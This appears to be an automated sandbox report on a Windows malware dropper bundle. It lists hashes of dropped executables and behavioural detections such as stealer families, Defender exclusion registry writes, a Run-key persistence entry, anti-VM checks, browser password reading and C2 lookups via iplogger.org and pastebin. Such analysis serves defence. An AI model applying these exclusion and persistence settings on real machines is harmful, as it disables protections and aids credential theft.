| SHA512 | 6c7cb5d0fb8efc43425dca72711c017971536ed74a7c4fe3e9cc47e63b8fe1f586a762d3c7edcee193250b4693382233720cc7b88fc6ca0f8f14b8769a77a5d9 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe
| MD5 | 480f84b5495d22186ca365cfbfc51594 |
| SHA1 | eae7c5ed3b0f729360fdd3879f65367a3d14dd95 |
| SHA256 | ab63359f23420ce59260dddb7a1747ff97daf656de360a79e35531032ba26e3f |
| SHA512 | ef7df3d3427e621ecc4bbdba0df717ba7509d36896bccfab1a2c461f019c95728936a42a6261649e9a6b8f5037f42678bdbe51ea82af68b8e8f8a9765ee57482 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1524d92394d.exe
| MD5 | 7362b881ec23ae11d62f50ee2a4b3b4c |
| SHA1 | 2ae1c2a39a8f8315380f076ade80028613b15f3e |
| SHA256 | 8af8843d8d5492c165ef41a8636f86f104bf1c3108372a0933961810c9032cf2 |
| SHA512 | 071879a8901c4d0eba2fa886b0a8279f4b9a2e3fbc7434674a07a5a8f3d6a6b87a6dce414d70a12ab94e3050bd3b55e8bfaf8ffea6d24ef6403c70bd4a1c5b74 |
C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp
| MD5 | a6865d7dffcc927d975be63b76147e20 |
| SHA1 | 28e7edab84163cc2d0c864820bef89bae6f56bf8 |
| SHA256 | fdfcbc8cfb57a3451a3d148e50794772d477ed6cc434acc779f1f0dd63e93f4b |
| SHA512 | a9d2b59b40793fb685911f0e452e43a8e83c1bd133fda8a2a210ef1b9ca7ad419b8502fbb75b37f1b0fdef6ad0381b7d910fbff0bcfdeeec9e26b81d11effcec |
C:\Users\Admin\AppData\Local\Temp\is-SFSN3.tmp\idp.dll
| MD5 | 55c310c0319260d798757557ab3bf636 |
| SHA1 | 0892eb7ed31d8bb20a56c6835990749011a2d8de |
| SHA256 | 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed |
| SHA512 | e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xqg5mmc.uyl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe
| MD5 | dcde74f81ad6361c53ebdc164879a25c |
| SHA1 | 640f7b475864bd266edba226e86672101bf6f5c9 |
| SHA256 | cc10c90381719811def4bc31ff3c8e32c483c0eeffcb149df0b071e5a60d517b |
| SHA512 | 821b1a05601bbaee21cbd0b3cf2859359795ae55a3df8dea81f1142ede74b52af31273ffbbba772d77e40477853e6b02c9df8c44fc2ddad1cf3d248530427fc0 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe
| MD5 | 0fef60f3a25ff7257960568315547fc2 |
| SHA1 | 8143c78b9e2a5e08b8f609794b4c4015631fcb0b |
| SHA256 | c7105cfcf01280ad26bbaa6184675cbd41dac98690b0dcd6d7b46235a9902099 |
| SHA512 | d999088ec14b8f2e1aa3a2f63e57488a5fe3d3375370c68c5323a21c59a643633a5080b753e3d69dfafe748dbdfeb6d7fa94bdf5272b4a9501fd3918633ee1e5 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15168f90478cc7.exe
| MD5 | 831ec888d8238e49c4371f643fdcaa9e |
| SHA1 | 5991867930cc585e201d50e7d76a7afada780f90 |
| SHA256 | 26ef4111e91e052367a9b8daed46b3684acf8ed665fe1b6bdf751995557fadb9 |
| SHA512 | d926bde2f13852fc084ec48e8baf00c36e06644f6d6a59918715752c5f092d7e258cca650d241f3d480713e8085aa1f17897fe9edea4764262c46be653de4609 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
| MD5 | 4bb6c620715fe25e76d4cca1e68bef89 |
| SHA1 | 0cf2a7aad7ad7a804ca2b7ccaea1a6aadd75fb80 |
| SHA256 | 0b668d0ac89d5da1526be831f7b8c3f2af54c5dbc68c0c9ce886183ec518c051 |
| SHA512 | 59203e7c93eda1698f25ee000c7be02d39eee5a0c3f615ae6b540c7a76e6d47265d4354fa38be5206810e6b035b8be1794ebe324c0e9db33360a4f0dd3910549 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun154ca5fada.exe
| MD5 | aa75aa3f07c593b1cd7441f7d8723e14 |
| SHA1 | f8e9190ccb6b36474c63ed65a74629ad490f2620 |
| SHA256 | af890b72e50681eee069a7024c0649ac99f60e781cb267d4849dae4b310d59c1 |
| SHA512 | b1984c431939e92ea6918afbbc226691d1e46e48f11db906fec3b7e5c49075f33027a2c6a16ab4861c906faa6b50fddc44201922e44a0243f9883b701316ca2b |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe
| MD5 | fb8851a1a68d306eb1623bad276012c3 |
| SHA1 | 33c2e2a59351591807853e58c24edb925e56a216 |
| SHA256 | d222076f428d9d190f72e7d6b0373083f2659804fdb2265603aa66efd640ff7e |
| SHA512 | 3ad2114d8ebde46e981f7ef261ace24a5a47674987047199d22eeeca82c3dd05aeed9a01ff1e6df11a180c051063c9d55cab09e923e8229e0d08e62b46d99b6a |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15e81af69f990d3a6.exe
| MD5 | 4c35bc57b828bf39daef6918bb5e2249 |
| SHA1 | a838099c13778642ab1ff8ed8051ff4a5e07acae |
| SHA256 | bfc863ff5634087b983d29c2e0429240dffef2a379f0072802e01e69483027d3 |
| SHA512 | 946e23a8d78ba0cfe7511e9f1a443ebe97a806e5614eb6f6e94602eeb04eb03ea87446e0b2c57e6102dad8ef09a7b46c10841aeebbffe4be81aad236608a2f3b |
memory/4312-137-0x0000000075410000-0x0000000075625000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe
| MD5 | b0e64f3da02fe0bac5102fe4c0f65c32 |
| SHA1 | eaf3e3cb39714a9fae0f1024f81a401aaf412436 |
| SHA256 | dbc10a499e0c3bddcfa7266d5cce117343e0d8a164bdaa5d5dbcfee5d5392571 |
| SHA512 | 579d4ba54a5a41cf2261360f0c009fd3e7b6990499e2366cb6f1eceacb2cc6215f053e780484908211b824711acbea389f3d91de6f40b9e2b6564baedd106805 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15591a43f8a.exe
| MD5 | c18fd5cf734e7438fb340750cd11c605 |
| SHA1 | 7a199f1836fdf27932cee19f83c7421ed05e9108 |
| SHA256 | 36a0dfbe4e1491c2d4b84e06fd4cf17d24e8a770f32618d6951f93db14158bc7 |
| SHA512 | d56380274c2d7e2b220dc994600c3edfc1a3511440418fbbc98d718368138d8f388fe337256b9d57b01ca5aad4a5d92d07c1d87ed8a9d03b1d1289b9cfcb27a0 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1580e9cd8c23e.exe
| MD5 | 88c2669e0bd058696300a9e233961b93 |
| SHA1 | fdbdc7399faa62ef2d811053a5053cd5d543a24b |
| SHA256 | 4e3c72337ad6ede0f71934734ba639a39949c003d7943cb946ea4173b23fd0b7 |
| SHA512 | e159767dbf9ce9cce58ee9ee8f2edeffdc9edcf56253ccd880b5f55014c56e267fdb8fdeb8e18c1bd2285e4a31938053c488ee52722d540352d6093dbe974e9c |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe
| MD5 | 9c41934cf62aa9c4f27930d13f6f9a0c |
| SHA1 | d8e5284e5cb482abaafaef1b5e522f38294001d2 |
| SHA256 | c55a03ca5ef870fd4b4fdf8595892155090f796578f5dd457030094b333d26b0 |
| SHA512 | d2c4d6af13557be60cf4df941f3184a5cce9305c1ca7a66c5a998073dbe2e3462a4afce992432075a875ca09297bb5559ccd7bca3e1fe2c59760a675192f49d5 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15372e8db79ed3d.exe
| MD5 | e52d81731d7cd80092fc66e8b1961107 |
| SHA1 | a7d04ed11c55b959a6faaaa7683268bc509257b2 |
| SHA256 | 4b6212f2dbf8eb176019a4748ce864dd04753af4f46c3d6d89d392a5fb007e70 |
| SHA512 | 69046e90e402156f358efa3baf74337eacd375a767828985ebe94e1b886d5b881e3896d2200c9c9b90abab284d75466bc649b81c9f9e89f040b0db5d301d1977 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe
| MD5 | 31f859eb06a677bbd744fc0cc7e75dc5 |
| SHA1 | 273c59023bd4c58a9bc20f2d172a87f1a70b78a5 |
| SHA256 | 671539883e1cd86422b94e84cc21f3d9737c8327b7a76c4972768248cb26b7e6 |
| SHA512 | 7d6a611bc76132a170a32fcbe4c3e3b528a90390b612ce2171febea59f1b723dafc0ec9628df50d07a9841561ddb23cdefbf3adcac160da60e337e7f3695e4ec |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15132bf2c585337a0.exe
| MD5 | 1f9b3bc156f958523739194cd2733887 |
| SHA1 | 524816ed7d4616af3137cf6dd48310441efdea3b |
| SHA256 | 3e2b6469551fac2d98c0efb1668096a4b247d30a1a0f40b1b2b16c3a78218abd |
| SHA512 | 296ce4dffa32bff8b04ad542e55832695c2643426def71aa8b4fc9973691eafb84bbc645abbde3ee96fb8b25322152e9ab68b550bf2f220ec8a38fba5747a16c |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1500b8e65c1f53.exe
| MD5 | 23a1ebcc1aa065546e0628bed9c6b621 |
| SHA1 | d8e8a400990af811810f5a7aea23f27e3b099aad |
| SHA256 | 9615e9c718ebdfae25e1424363210f252003cf2bc41bffdd620647fc63cd817a |
| SHA512 | 8942ce8c005f423d290220f7cc53ee112654428793287c0e330ee3318630845a86afcd9802fe56e540051f8224a71ddf9e4af59ea418469005ba0fbd770989a3 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1507dd11d509.exe
| MD5 | 43e459f57576305386c2a225bfc0c207 |
| SHA1 | 13511d3f0d41fe28981961f87c3c29dc1aa46a70 |
| SHA256 | fb58f709914380bce2e643aa0f64cd5458cb8b29c8f072cd1645e42947f89787 |
| SHA512 | 33cbcc6fb73147b7b3f2007be904faf01dc04b0e773bb1cfe6290f141b1f01cb260cd4f3826e30ab8c60d981bcc1b7f60e17ab7146ba32c94c87ac3a2b717207 |
C:\Users\Admin\AppData\Local\Temp\11111.exe
| MD5 | cc0d6b6813f92dbf5be3ecacf44d662a |
| SHA1 | b968c57a14ddada4128356f6e39fb66c6d864d3f |
| SHA256 | 0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498 |
| SHA512 | 4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 10:35
Reported
2024-11-08 10:38
Platform
win7-20240903-en
Max time kernel
79s
Max time network
147s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sun1585e1028b0.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Sun1585e1028b0.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1515dbfc0edab0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 348 set thread context of 2020 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe |
| PID 276 set thread context of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241108103628.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15e81af69f990d3a6.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15372e8db79ed3d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun150e9a93676ff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15c4c762b69ba5.exe | N/A |
